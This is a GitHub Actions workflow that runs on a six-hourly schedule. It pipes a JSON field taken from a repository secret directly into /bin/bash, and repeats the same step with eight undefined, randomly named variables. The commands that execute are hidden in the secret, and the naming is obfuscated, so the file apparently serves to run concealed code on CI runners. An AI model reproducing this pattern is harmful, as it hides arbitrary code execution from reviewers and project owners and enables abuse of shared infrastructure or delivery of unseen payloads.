name: dongguange7412
on:
  workflow_dispatch:
  schedule:
    - cron: '0 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongguange7412
        env:
          lde3: ${{ secrets.lde3 }}
        run: |
          echo $lde3 | jq -r .xkv5 | /bin/bash
          echo $cke72980 | jq -r .jfs1 | /bin/bash
          echo $sbanp53 | jq -r .z34 | /bin/bash
          echo $ar59 | jq -r .hyh0702 | /bin/bash
          echo $s4348 | jq -r .qjm18 | /bin/bash
          echo $gv26 | jq -r .stnb0188 | /bin/bash
          echo $jrzjj25883 | jq -r .efw71 | /bin/bash
          echo $f9462 | jq -r .ilvbo786 | /bin/bash
          echo $uor951 | jq -r .hypz34365 | /bin/bash

